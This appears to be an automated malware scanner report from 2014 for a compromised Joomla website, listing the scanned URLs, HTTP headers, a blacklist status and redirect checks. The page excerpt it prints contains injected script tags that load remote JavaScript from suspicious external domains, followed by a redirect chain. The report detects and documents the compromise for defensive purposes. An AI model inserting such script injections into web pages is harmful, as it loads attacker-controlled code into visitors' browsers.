New scan:

Malware Scanner report for nkts-nnov.ru

Malicious/Suspicious/Total urls checked
0/2/14
2 pages have suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "nkts-nnov.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=nkts-nnov.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://nkts-nnov.ru/
200 OK
Content-Length: 37183
Content-Type: text/html
suspicious
Page code contains blacklisted domain: expect-crown.biz

...[41341 bytes skipped]...
mla! Extensions</a> library today. </p></td>
</tr>
<tr>
<td valign="top" >
</td>
</tr>
</table>
</div>

</div>


</div>
</div>
<!-- END: BOTTOM SPOTLIGHT -->
<!-- BEGIN: FOOTER -->
<script type="text/javascript" charset="windows-1251" src="http://expect-crown.biz/a/91615902-nkts-nnov.ru.js"></script>
<script language='javascript' type='text/javascript' src='http://irmeeting.ru/93bypxy3fo95pdk039oidw11gdv3ukph'></script>
<div id="ja-footerwrap">
<div id="ja-footer" class="clearfix">
<div id="ja-footnav">
<ul id="mainlevel-nav"><li><a href="/index.php?option=com_content&amp;view=article&amp;id=25&amp;Itemid=28" class="mainlevel-nav" >About Joomla!</
...[3797 bytes skipped]...

http://nkts-nnov.ru/media/system/js/caption.js
200 OK
Content-Length: 1964
Content-Type: application/javascript
clean
http://nkts-nnov.ru/templates/ja_purity/js/ja.script.js
200 OK
Content-Length: 3208
Content-Type: application/javascript
clean
http://nkts-nnov.ru/templates/ja_purity/js/ja.rightcol.js
200 OK
Content-Length: 1696
Content-Type: application/javascript
clean
http://expect-crown.biz/a/91615902-nkts-nnov.ru.js
HTTP/1.1 302 Found
Date: Tue, 01 Apr 2014 23:30:09 GMT
Location: http://pagesinxt.com/?dn=expect-crown.biz&flrdr=yes&nxte=js
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cnection: close
X-Powered-By: PHP/5.3.21
clean
http://pagesinxt.com/?dn=expect-crown.biz&flrdr=yes&nxte=js
HTTP/1.1 302 Found
Date: Tue, 01 Apr 2014 23:30:10 GMT
Location: http://mypageresults.com/?dn=expect-crown.biz&flrdr=yes&nxte=js
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1
X-Cnection: close
clean
http://mypageresults.com/?dn=expect-crown.biz&flrdr=yes&nxte=js
200 OK
Content-Length: 2577
Content-Type: text/html
suspicious
Page code contains blacklisted domain: expect-crown.biz

<!--
top.location="http://mypageresults.com/?dn=expect-crown.biz&fp=tPihWYwHKdWPSnLJo1NznnMuWkjQsLny6MnhpCwPHypnm5zOxZSwsK2Z2v%2FRw9wJWlBCbFNAAKR9TtZ0wyA%2FLw%3D%3D&prvtof=8CvqWSXlNr2xUTEdLCdXO4pLTQKn2BhRNwJ7R4oFR%2F8%3D&poru=sywnmncu9x2g8PPJYalXlmC3DYtygSN1GidAV4hyzT%2FXDMr1MPVY3jBTK%2Be5EPOQyh0qLlYWyo5EDXmMy9ngI6695hG2e9sxI695NV1pqnAcb7VyeV3aqkoNQWzabLGy&cifr=1&flrdr=yes&nxte=js";
/*
-->
<script type="text/javascript">
<!--
dimensionUpd
...[2433 bytes skipped]...

http://mypageresults.com/?dn=expect-crown.biz&fp=tPihWYwHKdWPSnLJo1NznnMuWkjQsLny6MnhpCwPHypnm5zOxZSwsK2Z2v%2FRw9wJWlBCbFNAAKR9TtZ0wyA%2FLw%3D%3D&prvtof=f%2F3IwdSCVp2t40EeGBNcg0yP%2BOReDscTnPPcUydFrS0%3D&poru=pnxEmWnbYU2zJpH%2BHPXHvE0eC88DXhy2Qqr7VuZ0ZXu72OcedbHL3vnINqq6QNx3XUlveP88XvsdhFb%2FKrBTAzEvqsqup4%2FAe6Q5uBUxA%2BpZH3HwtG%2FZ0mjWbcQ2kQ%2BA&flrdr=yes&nxte=js
200 OK
Content-Length: 271
Content-Type: text/html
clean
http://mypageresults.com/test404page.js
HTTP/1.1 302 Found
Date: Tue, 01 Apr 2014 23:30:11 GMT
Location: http://pagesinxt.com/?dn=mypageresults.com&flrdr=yes&nxte=js
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cnection: close
X-Powered-By: PHP/5.3.21
clean
http://pagesinxt.com/?dn=mypageresults.com&flrdr=yes&nxte=js
HTTP/1.1 302 Found
Date: Tue, 01 Apr 2014 23:30:11 GMT
Location: http://mypageresults.com/?dn=mypageresults.com&flrdr=yes&nxte=js
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 335
Content-Type: text/html; charset=iso-8859-1
X-Cnection: close
clean
http://mypageresults.com/?dn=mypageresults.com&flrdr=yes&nxte=js
200 OK
Content-Length: 2511
Content-Type: text/html
clean
http://mypageresults.com/?dn=mypageresults.com&fp=QsYMewbdhR22gcOkW9DKKKpKxPDTySo46AnV186rihUm6fqW6d7pMuZFeM8ikKnEyQ8PPuS5b%2BBu91tpHUr9aQ%3D%3D&prvtof=bZD998mvBo%2BbXNN3wVi%2BD%2B%2FDftHBFRE6xKkJpWwDvAc%3D&poru=UIdn0x1%2B8DAjjR1HRwuLdZEA3b2qylm1AD7Z8UUz3D4YVW2WU6T5kzrZdnB%2BugSEyWwHI74hJLD6QoFOeYplbg6Eznbravx%2F%2BMEWVh%2BjrOw%3D&flrdr=yes&nxte=js
200 OK
Content-Length: 271
Content-Type: text/html
clean
http://irmeeting.ru/93bypxy3fo95pdk039oidw11gdv3ukph
200 OK
Content-Length: 5894
Content-Type: text/javascript
clean
http://stats.hosting24.com/count.php
200 OK
Content-Length: 960
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: nkts-nnov.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Tue, 01 Apr 2014 23:30:07 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.17
Content-Length: 37183
Content-Type: text/html;charset=windows-1251
Expires: Fri, 04 Apr 2014 00:00:00 GMT
Last-Modified: Tue, 01 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.17

...37183 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nkts-nnov.ru
Referer: http://www.google.com/search?q=nkts-nnov.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.